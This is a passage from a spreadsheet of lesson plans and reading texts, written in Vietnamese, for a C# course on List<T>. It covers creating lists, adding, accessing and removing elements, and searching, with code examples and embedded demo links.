- Mở tab **Có sức chứa ban đầu**. `new List&lt;string&gt;(10)` hiện 10 ô nét đứt nhưng Count vẫn 0. Dòng `names[0]` làm thẻ lỗi đỏ **ArgumentOutOfRangeException** xuất hiện, vì chưa có phần tử nào.
- Mở tab **Khởi tạo kèm giá trị**. List rỗng được tạo trước, rồi "An", "Bình", "Chi" lần lượt vào bằng ba lần `Add` (ô mới màu xanh). Kết quả cuối: Count 3, Capacity 4.
- Mở tab **Từ mảng có sẵn**. Hình chia hai bên: mảng `arr` và List `list`. Sau `new List&lt;int&gt;(arr)`, cả hai đều chứa 1, 2, 3. Khi `arr[0] = 99`, chỉ mảng đổi, còn `list[0]` vẫn in ra 1.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-collections-va-list-t-co-ban/khai-niem-va-khoi-tao-list-t/" title="Khởi tạo List&lt;T&gt;" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `Count` là số phần tử thật, `Capacity` chỉ là chỗ đã chuẩn bị sẵn, và chỉ truy cập được chỉ số từ 0 đến `Count - 1`. Dù khởi tạo bằng cách nào, List cũng là một đối tượng riêng. List tạo từ mảng là bản chép, không liên kết với mảng.
## Lưu ý về List&lt;object&gt;
Bạn có thể tạo `List&lt;object&gt;` để chứa nhiều kiểu khác nhau, nhưng nên tránh. Trình biên dịch không còn kiểm tra kiểu giúp bạn, ép kiểu sai sẽ gây `InvalidCastException`, và các kiểu giá trị như `int` bị đóng hộp (boxing) làm chậm chương trình. Hãy ưu tiên `List&lt;T&gt;` với một kiểu cụ thể.
## Tóm tắt
- `List&lt;T&gt;` là danh sách có thứ tự, kích thước động, chứa các phần tử cùng kiểu `T`.
- `Count` là số phần tử thật. `Capacity` là chỗ đã cấp sẵn, luôn lớn hơn hoặc bằng `Count`.
- `new List&lt;T&gt;()` bắt đầu với Capacity 0. Lần `Add` đầu cấp sẵn 4 chỗ.
- `new List&lt;T&gt;(n)` dành sẵn n chỗ nhưng List vẫn rỗng, chưa đọc được phần tử nào.
- Collection initializer thực chất gọi `Add` cho từng giá trị.
- `new List&lt;T&gt;(mảng)` chép dữ liệu sang List mới, đổi mảng sau đó không ảnh hưởng List.</t>
        </is>
      </c>
    </row>
    <row r="4" ht="409.6" customHeight="1" s="18">
      <c r="A4" s="10" t="n">
        <v>3</v>
      </c>
      <c r="B4" s="10" t="inlineStr">
        <is>
          <t>1. Cấu trúc dữ liệu nâng cao: Collections</t>
        </is>
      </c>
      <c r="C4" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu về Collections và List&lt;T&gt; cơ bản</t>
        </is>
      </c>
      <c r="D4" s="10" t="inlineStr">
        <is>
          <t>Thêm, Truy cập và Xóa phần tử trong List&lt;T&gt;</t>
        </is>
      </c>
      <c r="E4" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F4" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G4" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H4" s="10" t="inlineStr">
        <is>
          <t>Thấy các phần tử dịch chuyển thế nào khi Insert/Remove, và lỗi khi dùng chỉ số ngoài phạm vi.</t>
        </is>
      </c>
      <c r="I4" s="10" t="inlineStr">
        <is>
          <t>1 cột, 4 tab</t>
        </is>
      </c>
      <c r="J4" s="10" t="inlineStr">
        <is>
          <t>Dãy ô có chỉ số. Ô mới trượt vào (vàng); khi chèn ở giữa, các ô phía sau trượt phải và chỉ số đổi (mũi tên 1→2, 2→3). Ô bị xóa mờ dần rồi các ô sau trượt trái.</t>
        </is>
      </c>
      <c r="K4" s="10" t="inlineStr">
        <is>
          <t>H01, H03</t>
        </is>
      </c>
      <c r="L4" s="10" t="inlineStr">
        <is>
          <t>Add và Insert | Truy cập và sửa | Remove và RemoveAt | Lỗi chỉ số</t>
        </is>
      </c>
      <c r="M4" s="10" t="inlineStr">
        <is>
          <t>Add/Insert: fruits = {"Táo", "Cam"}. Add("Xoài") vào cuối (chỉ số 2). Insert(1, "Lê") → "Cam", "Xoài" dịch phải.
Truy cập: fruits[0] đọc "Táo"; fruits[2] = "Nho" sửa tại chỗ, Count không đổi.
Remove: Remove("Cam") xóa lần xuất hiện đầu tiên, các ô sau dịch trái, trả true. Remove("Dứa") không có → trả false, không lỗi. RemoveAt(0) xóa theo vị trí.
Lỗi chỉ số: danh sách 3 phần tử, đọc fruits[3] → ArgumentOutOfRangeException; nhắc chỉ số hợp lệ 0..Count − 1.
Bước cuối mỗi tab: tóm tắt trạng thái danh sách.</t>
        </is>
      </c>
      <c r="N4" s="10" t="inlineStr">
        <is>
          <t>Táo, Cam, Xoài, Lê, Nho, Dứa</t>
        </is>
      </c>
      <c r="O4" s="10" t="inlineStr">
        <is>
          <t>Thêm/xóa ở giữa làm dịch chỉ số các phần tử phía sau. Remove theo giá trị trả về bool, không ném lỗi khi không tìm thấy.</t>
        </is>
      </c>
      <c r="P4" s="10" t="inlineStr">
        <is>
          <t>RemoveAt/indexer với chỉ số sai ném ArgumentOutOfRangeException. Remove chỉ xóa lần xuất hiện đầu tiên.</t>
        </is>
      </c>
      <c r="Q4" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-collections-va-list-t-co-ban/them-truy-cap-va-xoa-phan-tu-trong-list-t/index.html</t>
        </is>
      </c>
      <c r="R4" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-collections-va-list-t-co-ban/them-truy-cap-va-xoa-phan-tu-trong-list-t/</t>
        </is>
      </c>
      <c r="S4" s="10" t="n"/>
      <c r="T4" s="12" t="n"/>
      <c r="U4" s="12" t="n"/>
      <c r="V4" s="21" t="inlineStr">
        <is>
          <t>Sau khi đã nắm vững khái niệm về List&lt;T&gt; và cách khởi tạo một danh sách, bước tiếp theo là tìm hiểu cách tương tác với các phần tử bên trong nó. List&lt;T&gt; cung cấp các phương thức mạnh mẽ và trực quan để thêm, truy cập và xóa các phần tử, giúp bạn quản lý dữ liệu một cách linh hoạt.
Thêm Phần tử vào List&lt;T&gt;
Việc thêm phần tử là thao tác cơ bản đầu tiên khi làm việc với bất kỳ danh sách nào. List&lt;T&gt; hỗ trợ hai cách chính để thêm phần tử: vào cuối danh sách hoặc vào một vị trí cụ thể.
Phương thức Add()
Phương thức Add() được dùng để thêm một phần tử mới vào cuối danh sách. Đây là cách phổ biến nhất để bổ sung dữ liệu vào List&lt;T&gt;.
List&lt;string&gt; danhSachMonHoc = new List&lt;string&gt;();
// Thêm các môn học vào cuối danh sách
danhSachMonHoc.Add("Toán");
danhSachMonHoc.Add("Lý");
danhSachMonHoc.Add("Hóa");
Console.WriteLine("Danh sách môn học sau khi Add:");
foreach (string monHoc in danhSachMonHoc)
{
    Console.WriteLine($"- {monHoc}");
}
// Kết quả:
// - Toán
// - Lý
// - Hóa
Phương thức Insert()
Khi bạn muốn thêm một phần tử vào một vị trí cụ thể trong danh sách, Insert() là phương thức phù hợp. Phương thức này nhận hai đối số: chỉ mục (index) nơi bạn muốn chèn và phần tử cần chèn. Các phần tử từ vị trí chèn trở đi sẽ được dịch chuyển sang phải.
Lưu ý rằng chỉ mục phải nằm trong phạm vi từ 0 đến Count của danh sách. Nếu chỉ mục vượt quá phạm vi này, một ArgumentOutOfRangeException sẽ được ném ra.
List&lt;string&gt; danhSachMonHoc = new List&lt;string&gt; { "Toán", "Lý", "Hóa" };
// Thêm "Văn" vào vị trí chỉ mục 1 (giữa Toán và Lý)
danhSachMonHoc.Insert(1, "Văn");
Console.WriteLine("\nDanh sách môn học sau khi Insert:");
foreach (string monHoc in danhSachMonHoc)
{
    Console.WriteLine($"- {monHoc}");
}
// Kết quả:
// - Toán
// - Văn
// - Lý
// - Hóa
Truy Cập Phần tử trong List&lt;T&gt;
Để đọc hoặc thay đổi giá trị của một phần tử tại một vị trí cụ thể trong List&lt;T&gt;, bạn sử dụng indexer (chỉ mục) với cú pháp dấu ngoặc vuông []. Giống như mảng, List&lt;T&gt; sử dụng chỉ mục dựa trên 0, nghĩa là phần tử đầu tiên có chỉ mục 0, phần tử thứ hai có chỉ mục 1, v.v.
List&lt;int&gt; danhSachSo = new List&lt;int&gt; { 10, 20, 30, 40, 50 };
// Truy cập phần tử tại chỉ mục 0
Console.WriteLine($"\nPhần tử đầu tiên: {danhSachSo[0]}"); // Kết quả: 10
// Truy cập phần tử tại chỉ mục 2
Console.WriteLine($"Phần tử thứ ba: {danhSachSo[2]}"); // Kết quả: 30
// Thay đổi giá trị của phần tử tại chỉ mục 1
danhSachSo[1] = 25;
Console.WriteLine($"Phần tử thứ hai sau khi thay đổi: {danhSachSo[1]}"); // Kết quả: 25
// Lấy số lượng phần tử hiện có
Console.WriteLine($"Số lượng phần tử trong danh sách: {danhSachSo.Count}"); // Kết quả: 5
// Thử truy cập một chỉ mục không hợp lệ sẽ gây ra lỗi
// Console.WriteLine(danhSachSo[5]); // Sẽ ném ra System.ArgumentOutOfRangeException
Việc truy cập phần tử bằng chỉ mục rất nhanh chóng và hiệu quả. Tuy nhiên, bạn cần đảm bảo chỉ mục nằm trong phạm vi từ 0 đến Count - 1. Nếu không, chương trình sẽ gặp lỗi ArgumentOutOfRangeException.
Xóa Phần tử khỏi List&lt;T&gt;
List&lt;T&gt; cung cấp nhiều phương thức để xóa phần tử, tùy thuộc vào việc bạn muốn xóa theo giá trị, theo vị trí hay xóa toàn bộ danh sách.
Phương thức Remove()
Phương thức Remove() được dùng để xóa lần xuất hiện đầu tiên của một phần tử có giá trị cụ thể trong danh sách. Nếu phần tử đó tồn tại và được xóa thành công, phương thức sẽ trả về true; ngược lại, nếu phần tử không tìm thấy, nó sẽ trả về false.
List&lt;string&gt; danhSachTraiCay = new List&lt;string&gt; { "Táo", "Cam", "Chuối", "Táo", "Xoài" };
Console.WriteLine("\nDanh sách trái cây ban đầu:");
foreach (string traiCay in danhSachTraiCay)
{
    Console.Write($"{traiCay} ");
}
Console.WriteLine();
// Xóa lần xuất hiện đầu tiên của "Táo"
bool daXoaTao = danhSachTraiCay.Remove("Táo");
Console.WriteLine($"Đã xóa 'Táo'? {daXoaTao}"); // Kết quả: True
Console.WriteLine("Danh sách trái cây sau khi xóa 'Táo':");
foreach (string traiCay in danhSachTraiCay)
{
    Console.Write($"{traiCay} ");
}
Console.WriteLine();
// Kết quả: Cam Chuối Táo Xoài
// Thử xóa một phần tử không tồn tại
bool daXoaLe = danhSachTraiCay.Remove("Lê");
Console.WriteLine($"Đã xóa 'Lê'? {daXoaLe}"); // Kết quả: False
Phương thức RemoveAt()
Phương thức RemoveAt() xóa phần tử tại một chỉ mục cụ thể. Tương tự như Insert(), chỉ mục phải hợp lệ (từ 0 đến Count - 1). Các phần tử sau vị trí bị xóa sẽ tự động dịch chuyển sang trái.
List&lt;string&gt; danhSachTraiCay = new List&lt;string&gt; { "Táo", "Cam", "Chuối", "Xoài" };
Console.WriteLine("\nDanh sách trái cây ban đầu:");
foreach (string traiCay in danhSachTraiCay)
{
    Console.Write($"{traiCay} ");
}
Console.WriteLine();
// Xóa phần tử tại chỉ mục 1 (Cam)
danhSachTraiCay.RemoveAt(1);
Console.WriteLine("Danh sách trái cây sau khi xóa phần tử tại chỉ mục 1:");
foreach (string traiCay in danhSachTraiCay)
{
    Console.Write($"{traiCay} ");
}
Console.WriteLine();
// Kết quả: Táo Chuối Xoài
// Thử xóa tại một chỉ mục không hợp lệ sẽ gây ra lỗi
// danhSachTraiCay.RemoveAt(10); // Sẽ ném ra System.ArgumentOutOfRangeException
Phương thức Clear()
Khi bạn muốn xóa tất cả các phần tử khỏi danh sách và làm cho nó trở thành một danh sách trống rỗng, phương thức Clear() là lựa chọn phù hợp nhất.
List&lt;string&gt; danhSachTraiCay = new List&lt;string&gt; { "Táo", "Cam", "Chuối" };
Console.WriteLine($"\nSố lượng phần tử ban đầu: {danhSachTraiCay.Count}"); // Kết quả: 3
// Xóa tất cả các phần tử
danhSachTraiCay.Clear();
Console.WriteLine($"Số lượng phần tử sau khi Clear: {danhSachTraiCay.Count}"); // Kết quả: 0
if (danhSachTraiCay.Count == 0)
{
    Console.WriteLine("Danh sách trái cây hiện đang trống.");
}
Nắm vững các phương thức cơ bản này sẽ giúp bạn thao tác với dữ liệu trong List&lt;T&gt; một cách hiệu quả và linh hoạt, đặt nền tảng vững chắc cho việc sử dụng các cấu trúc dữ liệu phức tạp hơn trong C#.</t>
        </is>
      </c>
      <c r="W4" s="22" t="inlineStr">
        <is>
          <t># Thêm, Truy cập và Xóa phần tử trong List&lt;T&gt;
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Phân biệt `Add` (thêm vào cuối) với `Insert` (chèn vào vị trí bất kỳ).
- Đọc và sửa phần tử bằng chỉ số `list[i]`.
- Phân biệt `Remove` (xóa theo giá trị) với `RemoveAt` (xóa theo vị trí), và dùng `Clear` để xóa hết.
- Giải thích vì sao chỉ số ngoài khoảng 0 đến `Count - 1` gây `ArgumentOutOfRangeException`.
- Quan sát các ô dịch chuyển và chỉ số thay đổi khi thêm, xóa bằng hoạt động mô phỏng.
## Thêm phần tử
### Add: thêm vào cuối
`Add` đặt phần tử mới vào **cuối** danh sách. Các phần tử cũ giữ nguyên chỉ số.
### Insert: chèn vào vị trí bất kỳ
`Insert(index, item)` chèn `item` tại chỉ số `index`. Các phần tử từ vị trí đó trở đi **dịch sang phải** một ô, nên chỉ số của chúng tăng thêm 1. Chỉ số hợp lệ cho `Insert` là từ 0 đến `Count` (chèn đúng bằng `Count` cũng được, tương đương `Add`).
```csharp
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main()
    {
        var fruits = new List&lt;string&gt; { "Táo", "Cam" };
        fruits.Add("Xoài");         // Táo, Cam, Xoài
        fruits.Insert(1, "Lê");     // Táo, Lê, Cam, Xoài
        Console.WriteLine(string.Join(", ", fruits));   // Táo, Lê, Cam, Xoài
    }
}
```
## Truy cập và sửa phần tử
Dùng **indexer** `list[chỉ số]` để đọc hoặc ghi tại chỗ. Chỉ số bắt đầu từ 0.
```csharp
var fruits = new List&lt;string&gt; { "Táo", "Cam", "Xoài" };
string s = fruits[0];     // "Táo", đọc không làm danh sách thay đổi
fruits[2] = "Nho";        // thay "Xoài" bằng "Nho" ngay tại chỗ
// Táo, Cam, Nho. Count vẫn là 3
```
Sửa bằng chỉ số **không làm đổi `Count`**.
### Chỉ số hợp lệ
Chỉ số hợp lệ là từ **0 đến `Count - 1`**. Ngoài khoảng đó, List ném `ArgumentOutOfRangeException`:
```csharp
var fruits = new List&lt;string&gt; { "Táo", "Cam", "Xoài" };
string a = fruits[2];   // "Xoài", phần tử cuối
string b = fruits[3];   // lỗi: ArgumentOutOfRangeException
// Index was out of range. Must be non-negative and less than the size of the collection. (Parameter 'index')
```
## Xóa phần tử
| Phương thức | Xóa gì | Trả về |
|---|---|---|
| `Remove(item)` | Lần xuất hiện **đầu tiên** của giá trị | `bool`: `true` nếu xóa được, `false` nếu không thấy |
| `RemoveAt(index)` | Phần tử tại chỉ số | Không trả về |
| `Clear()` | Toàn bộ phần tử | Không trả về |
Sau khi xóa, các phần tử phía sau **dịch sang trái** để lấp chỗ trống.
```csharp
var fruits = new List&lt;string&gt; { "Táo", "Cam", "Xoài", "Lê" };
bool a = fruits.Remove("Cam");    // true,  còn: Táo, Xoài, Lê
bool b = fruits.Remove("Dứa");    // false, không có "Dứa", không ném lỗi
fruits.RemoveAt(0);               // xóa "Táo", còn: Xoài, Lê
fruits.Clear();                   // xóa hết, Count = 0
```
`Remove` với giá trị không có chỉ trả về `false`. Còn `RemoveAt` với chỉ số ngoài khoảng 0 đến `Count - 1` thì ném `ArgumentOutOfRangeException`.
## Hoạt động: Các ô dịch chuyển
Mô phỏng dưới đây có bốn tab, mỗi tab là một tình huống với danh sách `fruits`. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Add và Insert**. Danh sách ban đầu là "Táo" (chỉ số 0) và "Cam" (chỉ số 1). `Add("Xoài")` thêm ô mới màu xanh ở chỉ số 2. `Insert(1, "Lê")` chèn "Lê" vào chỉ số 1, còn "Cam" và "Xoài" dịch sang phải (nhãn nhỏ dưới ô ghi `1→2` và `2→3`). Danh sách cuối: Táo, Lê, Cam, Xoài.
- Mở tab **Truy cập và sửa**. Danh sách có "Táo", "Cam", "Xoài". `fruits[0]` đọc ra "Táo" và danh sách không đổi. `fruits[2] = "Nho"` thay "Xoài" bằng "Nho" ngay tại chỗ, `Count` vẫn là 3.
- Mở tab **Remove và RemoveAt**. Danh sách có Táo, Cam, Xoài, Lê. `Remove("Cam")` tìm thấy "Cam" ở chỉ số 1 và ô đó bị đánh dấu xóa. Sau đó "Xoài" và "Lê" dịch trái (nhãn `2→1` và `3→2`), `a` là `true`. `Remove("Dứa")` không thấy gì: các ô được tô mờ, `b` là `false`, danh sách giữ nguyên. `RemoveAt(0)` xóa "Táo", còn Xoài, Lê.
- Mở tab **Lỗi chỉ số**. Danh sách có 3 phần tử nên chỉ số hợp lệ là 0 đến 2. `fruits[2]` đọc được "Xoài". `fruits[3]` làm hiện ô "?" đỏ và thẻ lỗi **ArgumentOutOfRangeException**, vì chỉ số 3 bằng `Count`.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-collections-va-list-t-co-ban/them-truy-cap-va-xoa-phan-tu-trong-list-t/" title="Thêm, truy cập và xóa phần tử trong List&lt;T&gt;" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `Add` thêm vào cuối, còn `Insert` và các phép xóa làm các phần tử phía sau dịch chuyển, nên chỉ số của chúng thay đổi. Đọc hoặc ghi bằng chỉ số chỉ hợp lệ trong khoảng 0 đến `Count - 1`.
## Tóm tắt
- `Add(x)` thêm vào cuối. `Insert(i, x)` chèn tại chỉ số `i` và đẩy các phần tử sau sang phải.
- `list[i]` đọc hoặc sửa tại chỗ, không đổi `Count`.
- Chỉ số hợp lệ là 0 đến `Count - 1`. Ngoài khoảng này ném `ArgumentOutOfRangeException`.
- `Remove(x)` xóa lần xuất hiện đầu tiên và trả về `bool`. `RemoveAt(i)` xóa theo vị trí. `Clear()` xóa hết.
- Sau mỗi lần xóa, các phần tử phía sau dịch sang trái.</t>
        </is>
      </c>
    </row>
    <row r="5" ht="409.6" customHeight="1" s="18">
      <c r="A5" s="10" t="n">
        <v>4</v>
      </c>
      <c r="B5" s="10" t="inlineStr">
        <is>
          <t>1. Cấu trúc dữ liệu nâng cao: Collections</t>
        </is>
      </c>
      <c r="C5" s="10" t="inlineStr">
        <is>
          <t>Thao tác nâng cao với List&lt;T&gt;</t>
        </is>
      </c>
      <c r="D5" s="10" t="inlineStr">
        <is>
          <t>Tìm kiếm phần tử trong List&lt;T&gt;</t>
        </is>
      </c>
      <c r="E5" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F5" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G5" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H5" s="10" t="inlineStr">
        <is>
          <t>Thấy mọi phép tìm trên List đều quét từ đầu, và phân biệt kết quả của IndexOf, Find, FindAll, Exists.</t>
        </is>
      </c>
      <c r="I5" s="10" t="inlineStr">
        <is>
          <t>1 cột, 4 tab</t>
        </is>
      </c>
      <c r="J5" s="10" t="inlineStr">
        <is>
          <t>Dãy ô với 'kính lúp' (ô đang xét nền vàng) di chuyển từng ô; dưới mỗi ô hiện kết quả điều kiện true/false; ô khớp viền xanh; kết quả trả về hiện trong thẻ riêng (một số, một phần tử, hay một List mới).</t>
        </is>
      </c>
      <c r="K5" s="10" t="inlineStr">
        <is>
          <t>H01, H22</t>
        </is>
      </c>
      <c r="L5" s="10" t="inlineStr">
        <is>
          <t>IndexOf / Contains | Find | FindAll | Exists</t>
        </is>
      </c>
      <c r="M5" s="10" t="inlineStr">
        <is>
          <t>IndexOf(9): xét 7, 4, 9 → trả 2 và dừng ở lần xuất hiện đầu. IndexOf(5) quét hết → −1. Contains(x) tương đương IndexOf(x) ≥ 0.
Find(x =&gt; x &gt; 8): xét từng ô, hiện kết quả điều kiện; trả 9 (phần tử đầu tiên khớp). Find(x =&gt; x &gt; 100) → trả 0 (default của int).
FindAll(x =&gt; x &gt;= 6): duyệt hết, thả các ô khớp vào một List mới {7, 9, 6, 9}; danh sách gốc giữ nguyên.
Exists(x =&gt; x &lt; 4): dừng ngay khi gặp 3 → true.
Bước cuối: ô đếm 'số ô đã xét' cho từng phép tìm.</t>
        </is>
      </c>
      <c r="N5" s="10" t="inlineStr">
        <is>
          <t>scores = {7, 4, 9, 6, 9, 3}</t>
        </is>
      </c>
      <c r="O5" s="10" t="inlineStr">
        <is>
          <t>IndexOf trả vị trí, Find trả phần tử, FindAll trả danh sách mới, Exists trả true/false. Tất cả đều duyệt tuần tự.</t>
        </is>
      </c>
      <c r="P5" s="10" t="inlineStr">
        <is>
          <t>Find không thấy trả default(T) (0 với int, null với đối tượng) nên dễ nhầm với giá trị hợp lệ; khi cần phân biệt dùng FindIndex hoặc Exists.</t>
        </is>
      </c>
      <c r="Q5" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/thao-tac-nang-cao-voi-list-t/tim-kiem-phan-tu-trong-list-t/index.html</t>
        </is>
      </c>
      <c r="R5" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/thao-tac-nang-cao-voi-list-t/tim-kiem-phan-tu-trong-list-t/</t>
        </is>
      </c>
      <c r="S5" s="10" t="n"/>
      <c r="T5" s="12" t="n"/>
      <c r="U5" s="12" t="n"/>
      <c r="V5" s="21" t="inlineStr">
        <is>
          <t>Giới thiệu về Tìm kiếm Phần tử trong List&lt;T&gt;
Trong quá trình phát triển ứng dụng, việc lưu trữ dữ liệu trong các cấu trúc như List&lt;T&gt; là rất phổ biến. Tuy nhiên, chỉ lưu trữ thôi là chưa đủ; chúng ta cần các phương pháp hiệu quả để tìm kiếm các phần tử cụ thể hoặc các phần tử thỏa mãn một điều kiện nào đó. C# cung cấp một bộ sưu tập phong phú các phương thức tích hợp sẵn cho List&lt;T&gt; giúp chúng ta thực hiện các tác vụ tìm kiếm này một cách dễ dàng và hiệu quả.
Việc nắm vững các phương thức tìm kiếm này không chỉ giúp bạn truy xuất dữ liệu nhanh chóng mà còn là nền tảng để xử lý dữ liệu phức tạp hơn, chẳng hạn như lọc, sắp xếp hoặc cập nhật các phần tử trong danh sách.
Phương thức Contains(): Kiểm tra sự tồn tại của phần tử
Phương thức Contains() là cách đơn giản nhất để kiểm tra xem một phần tử cụ thể có tồn tại trong List&lt;T&gt; hay không. Nó trả về một giá trị bool: true nếu phần tử được tìm thấy, và false nếu không.
Đây là phương thức lý tưởng khi bạn chỉ cần biết "có hay không" một phần tử tồn tại, mà không cần biết vị trí của nó.
List&lt;string&gt; danhSachMonHoc = new List&lt;string&gt; { "Toán", "Vật Lý", "Hóa Học", "Sinh Học" };
// Kiểm tra xem "Toán" có tồn tại không
bool coMonToan = danhSachMonHoc.Contains("Toán");
Console.WriteLine($"Có môn Toán trong danh sách không? {coMonToan}"); // Output: True
// Kiểm tra xem "Lịch Sử" có tồn tại không
bool coMonLichSu = danhSachMonHoc.Contains("Lịch Sử");
Console.WriteLine($"Có môn Lịch Sử trong danh sách không? {coMonLichSu}"); // Output: False
// Lưu ý: Contains() sử dụng phương thức Equals() để so sánh các đối tượng.
// Với các kiểu dữ liệu phức tạp (custom objects), bạn cần đảm bảo
// rằng phương thức Equals() được ghi đè đúng cách nếu muốn so sánh dựa trên giá trị.
Tìm chỉ mục với IndexOf() và LastIndexOf()
Khi bạn cần biết vị trí (chỉ mục) của một phần tử trong danh sách, IndexOf() và LastIndexOf() là các phương thức bạn cần sử dụng.
IndexOf(T item): Tìm chỉ mục của lần xuất hiện đầu tiên của một phần tử trong danh sách. Nếu phần tử không được tìm thấy, nó sẽ trả về -1.
LastIndexOf(T item): Tìm chỉ mục của lần xuất hiện cuối cùng của một phần tử trong danh sách. Tương tự, nếu không tìm thấy, nó sẽ trả về -1.
List&lt;int&gt; danhSachSo = new List&lt;int&gt; { 10, 20, 30, 20, 40, 50, 20 };
// Tìm chỉ mục của lần xuất hiện đầu tiên của số 20
int chiMucDauTien = danhSachSo.IndexOf(20);
Console.WriteLine($"Chỉ mục đầu tiên của số 20 là: {chiMucDauTien}"); // Output: 1
// Tìm chỉ mục của lần xuất hiện cuối cùng của số 20
int chiMucCuoiCung = danhSachSo.LastIndexOf(20);
Console.WriteLine($"Chỉ mục cuối cùng của số 20 là: {chiMucCuoiCung}"); // Output: 6
// Tìm chỉ mục của số không tồn tại (ví dụ: 99)
int chiMucKhongTonTai = danhSachSo.IndexOf(99);
Console.WriteLine($"Chỉ mục của số 99 là: {chiMucKhongTonTai}"); // Output: -1
Các phiên bản quá tải (overload) của IndexOf() và LastIndexOf() cũng cho phép bạn chỉ định phạm vi tìm kiếm (bắt đầu từ chỉ mục nào, tìm kiếm bao nhiêu phần tử).
Tìm kiếm theo điều kiện với Find() và FindAll() (Predicate)
Trong nhiều trường hợp, bạn không tìm kiếm một phần tử cụ thể mà là một phần tử (hoặc nhiều phần tử) thỏa mãn một điều kiện nhất định. Các phương thức Find() và FindAll() sử dụng Predicate&lt;T&gt; (thường được viết dưới dạng biểu thức lambda) để thực hiện tác vụ này.
Find(Predicate&lt;T&gt; match): Tìm và trả về phần tử đầu tiên trong danh sách thỏa mãn điều kiện được chỉ định bởi Predicate&lt;T&gt;. Nếu không tìm thấy phần tử nào, nó sẽ trả về giá trị mặc định của kiểu dữ liệu T (ví dụ: null cho kiểu tham chiếu, 0 cho int).
FindAll(Predicate&lt;T&gt; match): Tìm và trả về tất cả các phần tử trong danh sách thỏa mãn điều kiện được chỉ định. Kết quả trả về là một List&lt;T&gt; mới chứa các phần tử tìm được. Nếu không có phần tử nào thỏa mãn, nó trả về một List&lt;T&gt; rỗng.
Predicate&lt;T&gt; là một delegate nhận vào một tham số kiểu T và trả về một bool. Biểu thức lambda là cách viết ngắn gọn và tiện lợi để định nghĩa Predicate&lt;T&gt; ngay tại chỗ.
public class SinhVien
{
    public int MaSo { get; set; }
    public string Ten { get; set; }
    public double DiemTrungBinh { get; set; }
}
List&lt;SinhVien&gt; danhSachSinhVien = new List&lt;SinhVien&gt;
{
    new SinhVien { MaSo = 101, Ten = "An", DiemTrungBinh = 8.5 },
    new SinhVien { MaSo = 102, Ten = "Bình", DiemTrungBinh = 7.0 },
    new SinhVien { MaSo = 103, Ten = "Cường", DiemTrungBinh = 9.2 },
    new SinhVien { MaSo = 104, Ten = "Dung", DiemTrungBinh = 8.5 }
};
// Sử dụng Find() để tìm sinh viên đầu tiên có điểm trung bình lớn hơn 8.0
SinhVien svDiemCao = danhSachSinhVien.Find(sv =&gt; sv.DiemTrungBinh &gt; 8.0);
if (svDiemCao != null)
{
    Console.WriteLine($"Sinh viên đầu tiên có điểm &gt; 8.0: {svDiemCao.Ten} ({svDiemCao.DiemTrungBinh})"); // Output: An (8.5)
}
// Sử dụng FindAll() để tìm tất cả sinh viên có điểm trung bình bằng 8.5
List&lt;SinhVien&gt; svCoDiem8_5 = danhSachSinhVien.FindAll(sv =&gt; sv.DiemTrungBinh == 8.5);
Console.WriteLine("Các sinh viên có điểm trung bình 8.5:");
foreach (var sv in svCoDiem8_5)
{
    Console.WriteLine($"- {sv.Ten} ({sv.DiemTrungBinh})");
}
// Output:
// - An (8.5)
// - Dung (8.5)
// Tìm sinh viên không tồn tại
SinhVien svKhongCo = danhSachSinhVien.Find(sv =&gt; sv.MaSo == 999);
Console.WriteLine($"Sinh viên mã số 999: {(svKhongCo == null ? "Không tìm thấy" : svKhongCo.Ten)}"); // Output: Không tìm thấy
Kiểm tra sự tồn tại có điều kiện với Any() và All()
Các phương thức mở rộng LINQ (Language Integrated Query) Any() và All() cung cấp một cách mạnh mẽ và biểu cảm để kiểm tra các điều kiện trên toàn bộ danh sách. Mặc dù chúng không trực tiếp trả về các phần tử, nhưng chúng rất hữu ích cho việc kiểm tra sự tồn tại có điều kiện.
Any(Func&lt;T, bool&gt; predicate): Trả về true nếu ít nhất một phần tử trong danh sách thỏa mãn điều kiện được chỉ định. Nếu danh sách rỗng hoặc không có phần tử nào thỏa mãn, nó trả về false.
All(Func&lt;T, bool&gt; predicate): Trả về true nếu tất cả các phần tử trong danh sách thỏa mãn điều kiện được chỉ định. Nếu danh sách rỗng, nó trả về true (một tập hợp rỗng luôn thỏa mãn mọi điều kiện). Nếu có bất kỳ phần tử nào không thỏa mãn, nó trả về false.
List&lt;int&gt; danhSachDiem = new List&lt;int&gt; { 60, 75, 80, 90, 55 };
// Kiểm tra xem có bất kỳ điểm nào lớn hơn 85 không
bool coDiemCao = danhSachDiem.Any(diem =&gt; diem &gt; 85);
Console.WriteLine($"Có điểm nào lớn hơn 85 không? {coDiemCao}"); // Output: True
// Kiểm tra xem tất cả các điểm đều lớn hơn hoặc bằng 50 không
bool tatCaDat = danhSachDiem.All(diem =&gt; diem &gt;= 50);
Console.WriteLine($"Tất cả các điểm đều đạt (&gt;=50) không? {tatCaDat}"); // Output: True
